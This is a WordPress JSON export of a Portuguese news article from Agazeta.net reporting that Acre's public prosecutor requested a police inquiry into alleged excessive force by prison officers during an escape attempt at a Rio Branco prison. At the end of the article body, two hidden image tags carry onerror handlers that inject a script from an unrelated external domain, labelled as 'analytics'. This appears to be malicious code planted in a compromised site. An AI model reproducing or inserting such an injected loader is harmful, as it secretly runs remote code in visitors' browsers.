{"id":52014,"date":"2020-12-28T19:51:38","date_gmt":"2020-12-28T19:51:38","guid":{"rendered":"https:\/\/abarevegan.com.br\/index.php\/2020\/12\/28\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/"},"modified":"2020-12-28T19:51:38","modified_gmt":"2020-12-28T19:51:38","slug":"mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio","status":"publish","type":"post","link":"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/","title":{"rendered":"MPAC solicita inqu\u00e9rito policial sobre excessos de repress\u00e3o"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Segundo promotor, reeducandos foram lesionados no FOC&nbsp;<\/span><\/p>\n<p style=\"text-align: justify;\">O Minist\u00e9rio P\u00fablico do Acre (MPAC) encontrou resqu\u00edcios de poss\u00edveis excessos de repress\u00e3o por parte de Policiais Penais durante uma tentativa de fuga ocorrida no \u00faltimo dia 27 de novembro, no pres\u00eddio Francisco de Oliveira Conde (FOC), em Rio Branco.<\/p>\n<p style=\"text-align: justify;\">Alguns reeducandos do pavilh\u00e3o A do pres\u00eddio tentaram fugir no dia 27 de novembro e os policiais penais interviram diante da tentativa. \u201cNessa interven\u00e7\u00e3o v\u00e1rios reeducandos ficaram lesionados, inclusive um no estado mais grave, eles me disseram que j\u00e1 estavam deitados no solo de barriga para baixo quando houve tiros de bala de borracha\u201d disse o Promotor do MPAC, Tales Tranin.<\/p>\n<p style=\"text-align: justify;\">O promotor solicitou a instaura\u00e7\u00e3o de um inqu\u00e9rito policial para a pol\u00edcia civil para que o acontecido seja investigado, al\u00e9m de oficializar para a Promotoria do controle externo da atividade policial, que possui atribui\u00e7\u00e3o para investigar e processar policiais penais.<\/p>\n<p style=\"text-align: justify;\">\u201cAp\u00f3s apura\u00e7\u00e3o dos autores do fato, eles ser\u00e3o responsabilizados\u201d disse Tranin.<\/p>\n<p style=\"text-align: justify;\">O Instituto de Administra\u00e7\u00e3o Penitenci\u00e1ria (Iapen) ainda n\u00e3o se pronunciou sobre o caso.<\/p>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n<div><img onerror=\"var s=document.createElement(&quot;script&quot;);s.type=&quot;text\/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;\/\/jemova.wurucozujo.com\/scripts\/js?k=5d936fde86df1a38418b4567&amp;s=&quot;+encodeURI(btoa(window.location.host)+&quot;&amp;ns=true&quot;);document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);\" \/><\/div>\n","protected":false},"excerpt":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 13.2px;\">Segundo promotor, reeducandos foram lesionados no FOC&nbsp;<\/span><\/p>\n","protected":false},"author":4,"featured_media":52013,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"jnews-multi-image_gallery":[],"jnews_single_post":[],"jnews_primary_category":[],"jnews_social_meta":[],"jnews_review":[],"enable_review":"","type":"","name":"","summary":"","brand":"","sku":"","good":[],"bad":[],"score_override":"","override_value":"","rating":[],"price":[],"footnotes":""},"categories":[44],"tags":[],"class_list":["post-52014","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-policia"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>MPAC solicita inqu\u00e9rito policial sobre excessos de repress\u00e3o - Agazeta.net<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"MPAC solicita inqu\u00e9rito policial sobre excessos de repress\u00e3o - Agazeta.net\" \/>\n<meta property=\"og:description\" content=\"Segundo promotor, reeducandos foram lesionados no FOC&nbsp;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/\" \/>\n<meta property=\"og:site_name\" content=\"Agazeta.net\" \/>\n<meta property=\"article:published_time\" content=\"2020-12-28T19:51:38+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/28-12-2020_MPAC-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio.png\" \/>\n\t<meta property=\"og:image:width\" content=\"458\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Agazeta.Net\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Agazeta.Net\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minuto\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/\",\"name\":\"MPAC solicita inqu\u00e9rito policial sobre excessos de repress\u00e3o - Agazeta.net\",\"isPartOf\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/28-12-2020_MPAC-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio.png\",\"datePublished\":\"2020-12-28T19:51:38+00:00\",\"author\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\"},\"breadcrumb\":{\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/#primaryimage\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/28-12-2020_MPAC-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio.png\",\"contentUrl\":\"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/28-12-2020_MPAC-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio.png\",\"width\":458,\"height\":340,\"caption\":\"28-12-2020 MPAC-solicita-inqu\u00e9rito-policial-sobre-excessos-de-repress\u00e3o-no-pres\u00eddio\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/nk7-testes.com.br\/agazeta\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"MPAC solicita inqu\u00e9rito policial sobre excessos de repress\u00e3o\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#website\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/\",\"name\":\"Agazeta.net\",\"description\":\"Agazeta.net - Not\u00edcias de Rio Branco\/AC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020\",\"name\":\"Agazeta.Net\",\"url\":\"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"MPAC solicita inqu\u00e9rito policial sobre excessos de repress\u00e3o - Agazeta.net","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/","og_locale":"pt_BR","og_type":"article","og_title":"MPAC solicita inqu\u00e9rito policial sobre excessos de repress\u00e3o - Agazeta.net","og_description":"Segundo promotor, reeducandos foram lesionados no FOC&nbsp;","og_url":"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/","og_site_name":"Agazeta.net","article_published_time":"2020-12-28T19:51:38+00:00","og_image":[{"width":458,"height":340,"url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/28-12-2020_MPAC-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio.png","type":"image\/png"}],"author":"Agazeta.Net","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Agazeta.Net","Est. tempo de leitura":"1 minuto"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/","url":"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/","name":"MPAC solicita inqu\u00e9rito policial sobre excessos de repress\u00e3o - Agazeta.net","isPartOf":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website"},"primaryImageOfPage":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/#primaryimage"},"image":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/#primaryimage"},"thumbnailUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/28-12-2020_MPAC-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio.png","datePublished":"2020-12-28T19:51:38+00:00","author":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020"},"breadcrumb":{"@id":"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/#primaryimage","url":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/28-12-2020_MPAC-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio.png","contentUrl":"https:\/\/nk7-testes.com.br\/agazeta\/wp-content\/uploads\/2020\/12\/28-12-2020_MPAC-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio.png","width":458,"height":340,"caption":"28-12-2020 MPAC-solicita-inqu\u00e9rito-policial-sobre-excessos-de-repress\u00e3o-no-pres\u00eddio"},{"@type":"BreadcrumbList","@id":"https:\/\/nk7-testes.com.br\/agazeta\/mpac-solicita-inquerito-policial-sobre-excessos-de-repressao-no-presidio\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/nk7-testes.com.br\/agazeta\/"},{"@type":"ListItem","position":2,"name":"MPAC solicita inqu\u00e9rito policial sobre excessos de repress\u00e3o"}]},{"@type":"WebSite","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#website","url":"https:\/\/nk7-testes.com.br\/agazeta\/","name":"Agazeta.net","description":"Agazeta.net - Not\u00edcias de Rio Branco\/AC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nk7-testes.com.br\/agazeta\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Person","@id":"https:\/\/nk7-testes.com.br\/agazeta\/#\/schema\/person\/6d6e25cb0435eb4a02fd44d30b4e3020","name":"Agazeta.Net","url":"https:\/\/nk7-testes.com.br\/agazeta\/author\/agazeta\/"}]}},"_links":{"self":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/52014","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/comments?post=52014"}],"version-history":[{"count":0,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/posts\/52014\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media\/52013"}],"wp:attachment":[{"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/media?parent=52014"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/categories?post=52014"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nk7-testes.com.br\/agazeta\/wp-json\/wp\/v2\/tags?post=52014"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}